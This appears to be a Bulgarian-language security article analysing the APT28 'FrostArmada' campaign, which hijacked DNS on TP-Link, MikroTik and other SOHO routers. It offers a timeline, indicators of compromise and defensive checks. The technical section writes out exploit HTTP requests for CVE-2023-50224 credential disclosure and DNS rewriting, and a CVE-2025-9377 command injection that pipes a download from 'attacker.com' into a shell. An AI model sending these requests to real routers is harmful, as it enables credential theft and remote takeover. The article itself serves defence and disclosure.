Резюме
На 7 април 2026 г. ФБР, Министерството на правосъдието на САЩ, Microsoft и изследователите от Lumen Technologies обявиха неутрализирането на мащабна руска кибершпионска операция, наречена FrostArmada. Кампанията е проведена от APT28 (известна още като Fancy Bear, Forest Blizzard, Sofacy) — кибер звено на руското ГРУ, Военна единица 26165. При пика си мрежата е обхванала над 18,000 компрометирани устройства в 120 страни, насочени срещу правителствени агенции, правоохранителни органи и IT инфраструктура по целия свят.
Кой стои зад атаката
APT28 е известна под множество имена: Fancy Bear, Forest Blizzard, Sofacy, Sednit, Pawn Storm и Storm-2754. Групата е идентифицирана като кибер звено на руското ГРУ, Военна единица 26165 — същото звено, стояло зад хака на Демократическата партия на САЩ през 2016 г., атаките срещу германския парламент през 2015 г. и опита за саботаж на OPCW през 2018 г.
Хронология на кампанията
Май 2025 — Тихото начало
Най-ранната засечена активност датира от 19 май 2025 г., когато първият AitM (Attacker-in-the-Middle) нод с IP адрес 64.120.31.96 (LeaseWeb USA, Ню Йорк) е идентифициран, получавайки DNS трафик от MikroTik рутер на афганистанското правителство. В началото кампанията е силно таргетирана и ограничена по обхват.
5–6 август 2025 — Масовата ескалация
На 5 август 2025 г. UK NCSC публикува доклада „Authentic Antics", описващ Forest Blizzard инструмент за кражба на Microsoft Office credentials. На следващия ден — 6 август — Lumen засича рязка ескалация: масово компрометиране на рутери и DNS пренасочване в глобален мащаб. Вторият основен AitM нод (79.141.160.78, HZ Hosting, България) веднага поема пика на активност, обработвайки и стандартни DNS заявки, и DNS-over-TLS (DoT).
Това показва, че след публичното разкриване на един метод, APT28 незабавно е преминала към алтернативен — класически признак за highly adaptive threat actor.
Декември 2025 — Пикът
При пика на активността между 12 декември 2025 г. и 13 януари 2026 г.:
- 290,000+ уникални IP адреса са изпратили поне една DNS заявка към руската инфраструктура
- ~40,000 устройства с 5+ взаимодействия (ниска увереност за жертви)
- ~18,000 устройства с 10+ взаимодействия в рамките на 30 дни (умерена увереност)
- 200+ организации и 5,000 потребителски устройства идентифицирани от Microsoft
7 април 2026 — Operation Masquerade
ФБР, водено от Boston Field Office, провежда съдебно-оторизирана техническа операция — „Operation Masquerade". ФБР разработва специализирани команди за дистанционно ресетване на DNS настройките на компрометираните рутери в над 23 американски щата, принуждавайки ги да се свържат с легитимни DNS резолвери. Полша, Microsoft и Lumen Technologies участват като партньори в операцията.
Техническо описание на атаката
Инфраструктура на APT28
Кампанията работи с два отделни клъстера:
Клъстер 1 — „Expansion Team" (август–септември 2025)
Фокусиран върху масово компрометиране на нови устройства чрез сканиране за изложени web интерфейси на рутери и firewall устройства.
Клъстер 2 — AitM & Credential Collection
Обработва пренасочения DNS трафик, прехваща authentication материали и ги ексфилтрира.
Стъпките на атаката
1. СКАНИРАНЕ
APT28 сканира интернет за рутери с изложен web интерфейс (порт 80/443)
↓
2. EXPLOIT (CVE-2023-50224)
GET /tmp/dropbear/dropbearpwd → извличане на admin credentials без парола
↓
3. DNS ПРЕНАПИСВАНЕ
GET заявка пренаписва Primary DNS → руски VPS
Secondary DNS остава оригиналният (за да не изглежда подозрително)
↓
4. DHCP РАЗПРОСТРАНЕНИЕ
Новите DNS настройки автоматично се разпространяват към всички устройства в мрежата
↓
5. ПРИХВАЩАНЕ
Потребителят отваря outlook.com → рутерът пита руски DNS → получава руски IP
Браузърът се свързва с руски AitM сървър → TLS предупреждение
↓
6. КРАЖБА НА CREDENTIALS
Ако потребителят игнорира предупреждението → пароли и OAuth токени откраднати
Дори MFA не защитава при активна AitM атакаЗащо е толкова опасно
Атаката не изисква инсталиране на malware на крайните устройства. Нападателите просто сменят DNS настройките на рутера — нещо, което повечето инструменти за сигурност не следят. Единствената видима следа за потребителя е предупреждение за невалиден TLS сертификат при влизане в Outlook или Microsoft 365, което повечето хора игнорират.
CVE-2023-50224 — Техническа разбивка
| Параметър | Стойност |
|---|---|
| CVE | CVE-2023-50224 |
| CVSS Score | 6.5 (Medium) |
| Тип | Authentication Bypass by Spoofing / Unauthenticated Information Disclosure |
| Засегнат компонент | httpd service, TCP порт 80 |
| Файл | /tmp/dropbear/dropbearpwd |
| Автентикация | Не е необходима |
| Добавена в CISA KEV | 3 септември 2025 |
Стъпка 1 — Извличане на credentials (без парола)
GET /tmp/dropbear/dropbearpwd HTTP/1.1
Host: <router-ip>Отговор на рутера:
admin:$1$GTN.gpri$DlSyKvZKMR9A9Uj9aNXh11В стари firmware версии credentials могат да се върнат в plaintext.
Стъпка 2 — Пренаписване на DNS
GET /cgi?[LAN_HOST_CFG#1,0,0,0,0,0#0,0,0,0,0,0]0,4&
DNSServers=79.141.160.78,8.8.8.8 HTTP/1.1
Host: <router-ip>
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Primary DNS → руски VPS (79.141.160.78)
Secondary DNS → оригиналният (8.8.8.8) — за камуфлаж
Верижна атака с CVE-2025-9377 (CVSS 8.6)
В по-агресивни случаи, след получаване на credentials чрез CVE-2023-50224, нападателите използват и CVE-2025-9377 — command injection в страницата за Parental Controls:
POST /cgi-bin/luci/admin/parental HTTP/1.1
Host: <router-ip>
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
url_0=;curl${IFS}http://attacker.com/payload|sh;Резултатът е пълно Remote Code Execution — нападателят може да инсталира persistent backdoor, оцеляващ дори след factory reset.
Засегнати устройства
TP-Link модели (списъкът не е изчерпателен)
| Серия | Модели |
|---|---|
| WR серия | WR841N, WR740N, WR840N, WR842N, WR845N, WR941ND, WR1043ND |
| WDR серия | WDR3500, WDR3600, WDR4300 |
| Archer серия | Archer C5, Archer C7 |
| MR серия (LTE) | MR3420, MR6400 |
WR841N е основният вектор чрез CVE-2023-50224. NCSC посочва, че списъкът вероятно не е изчерпателен.
MikroTik
Всички устройства с RouterOS преди версия 7.14.2. Вторият клъстер от атаките е насочен специфично срещу MikroTik рутери, много от тях в Украйна.
Fortinet / Nethesis
По-стари модели Fortinet файъруоли с известни CVE. Nethesis е по-малка марка, таргетирана опортюнистично — засечена при италиански организации.
VPS инфраструктура на APT28
| IP адрес | Провайдър | ASN | Локация | Период |
|---|---|---|---|---|
64.120.31.96 |
LeaseWeb USA | AS396362 | Ню Йорк, САЩ | май 2025 – март 2026 |
79.141.160.78 |
HZ Hosting Ltd (HostZealot) | AS202015 | Пловдив, България | юли 2025 – март 2026 |
23.106.120.119 |
LeaseWeb Singapore | AS59253 | Сингапур | юли 2025 – март 2026 |
79.141.173.211 |
HZ Hosting Ltd (HostZealot) | AS202015 | Пловдив, България | юли 2025 – март 2026 |
185.117.89.32 |
HZ Hosting Ltd (HostZealot) | AS59711 | Стокхолм, Швеция | септември 2025 |
185.237.166.55 |
Zubritska Valeriia Nikolaevna | AS207560 | Украйна | декември 2025 |
Ключово наблюдение: 3 от 6 VPS адреса са регистрирани при HZ Hosting Ltd (HostZealot) — компания с адрес в Пловдив, България, известна в cybersecurity общностите с либерална политика спрямо злоупотреби. Разпределението между различни юрисдикции и провайдъри е умишлено — за да усложни атрибуцията и смъкването на сървърите.
Засегнати цели и сектори
Географски обхват
- 120 страни при пика на активността
- Съсредоточена активност в Северна Африка, Централна Америка, Югоизточна Азия и Европа
- Компрометирани рутери в 23+ американски щата
- Специфично таргетиране на MikroTik устройства в Украйна
Засегнати организации
- Министерства на външните работи
- Национални правоохранителни органи
- IT, хостинг и по-малки облачни провайдъри в Европа
- Национална платформа за идентичност в една европейска страна
- Три правителствени организации в Африка (не хоствани на Microsoft инфраструктура)
- Доставчици на имейл услуги в САЩ и Европа
Какво е откраднато
- Пароли за Microsoft 365 / Outlook Web Access
- OAuth токени (позволяват достъп без парола дори след смяна на паролата)
- Имейли и web browsing данни
- Корпоративни credentials
Firmware — какво да инсталирате
| Устройство | Безопасна версия | Бележка |
|---|---|---|
| MikroTik | RouterOS 7.14.2 или по-нова | Адресира множество уязвимости, използвани от APT28 |
| TP-Link | Firmware след март 2025 | Проверете на tp-link.com за вашия модел |
| Fortinet | Последна за модела | EOL устройства — подменете изцяло |
| Nethesis | Проверете с производителя | По-малко разпространен |
Как да проверите дали сте засегнати
1. Проверете DNS настройките на рутера
Влезте в admin панела (обикновено 192.168.0.1 или 192.168.1.1) и проверете Primary DNS и Secondary DNS в DHCP/LAN настройките. Легитимните стойности са тези на вашия ISP, или известни DNS сървъри като 8.8.8.8 (Google) / 1.1.1.1 (Cloudflare). Ако видите непознати IP адреси — рутерът е компрометиран.
2. Проверете от командния ред
# На Windows
nslookup outlook.com
# Сравнете резултата с очаквания IP на Microsoft
# На Linux/macOS
dig outlook.com @8.8.8.8
dig outlook.com
# Ако двата отговора се различават — имате проблем3. TLS предупреждения — важен сигнал
Ако браузърът ви е показвал предупреждения за невалиден сертификат при влизане в Outlook, Microsoft 365 или подобни услуги и сте ги игнорирали — приемайте credentials-ите за компрометирани и ги сменете незабавно от друга мрежа.
4. За MikroTik
# В Winbox или SSH:
/system routerboard print
# Проверете версията на RouterOS — трябва да е 7.14.2 или по-нова5. За TP-Link
Навигирайте до: Advanced → System Tools → Firmware Upgrade → Current Firmware Version и сравнете с последната версия на официалния сайт на TP-Link за вашия модел.
Препоръки за защита
Незабавни действия
- Обновете firmware на всички рутери и firewall устройства
- Проверете DNS настройките ръчно в admin панела
- Деактивирайте remote management ако не ви е необходим
- Подменете EOL устройства — особено TP-Link WR841N и подобни, за които няма повече patch поддръжка
- Сменете паролите за Microsoft 365 ако имате съмнения, от чиста мрежа
За организации
- Имплементирайте certificate pinning за корпоративни устройства чрез MDM решение
- Следете DNS логовете за необичайни заявки
- Изолирайте SOHO рутери от корпоративната мрежа
- Прилагайте принципа на минимална привилегия за мрежов достъп
- Добавете IoC-ите от NCSC advisory към вашия SIEM/firewall
Дългосрочно
APT28 има доказана история на адаптация след публично разкриване на методите им. Неутрализирането на FrostArmada инфраструктурата на 7 април 2026 г. не означава края на активността — групата почти сигурно ще се върне с нови методи. Следете advisory-та от NCSC, CISA и Microsoft Threat Intelligence.
Индикатори за компромис (IoC)
Злонамерени IP адреси (VPS сървъри на APT28)
64.120.31[.]96
79.141.160[.]78
23.106.120[.]119
79.141.173[.]211
185.117.89[.]32
185.237.166[.]55Инфраструктурата е неутрализирана на 7 април 2026. Тези IP адреси са исторически IoC — бъдеща активност ще използва различни адреси.
CVE референции
- CVE-2023-50224 — TP-Link WR841N unauthenticated credential disclosure (CVSS 6.5)
- CVE-2025-9377 — TP-Link Archer C7 / WR841N command injection RCE (CVSS 8.6)
ASN на злонамерена инфраструктура
- AS202015 — HZ Hosting Ltd (HostZealot), България
- AS59711 — HZ Hosting Ltd (HostZealot), Швеция
- AS207560 — Zubritska Valeriia Nikolaevna, Украйна
Официални източници
| Организация | Документ |
|---|---|
| Lumen / Black Lotus Labs | FrostArmada: All thriller, no (malware) filler |
| UK NCSC | APT28 exploit routers to enable DNS hijacking operations |
| US DOJ | Justice Department Disruption of DNS Hijacking Network |
| Microsoft | Forest Blizzard SOHO Router Compromise |
| CISA KEV | CVE-2023-50224 |
| TP-Link Advisory | Security Advisory CVE-2023-50224 |
Заключение
FrostArmada е показателна кампания по няколко причини. Първо, APT28 е избрала да не използва zero-day уязвимости — вместо това е разчитала на стари, известни пропуски в евтини SOHO рутери, за които собствениците просто не са пуснали patch. Второ, атаката е почти невидима за крайния потребител — никакъв malware, никакви файлове, само промяна на DNS настройка в рутера. Трето, дори MFA не е достатъчна защита при активна AitM атака — OAuth токените се прихващат след завършена автентикация.
Домашните и офис рутерите остават сериозен пробив в сигурността на организациите — особено при хибридна работа. Те рядко се следят, рядко се обновяват и дават директен достъп до трафика на всички свързани устройства.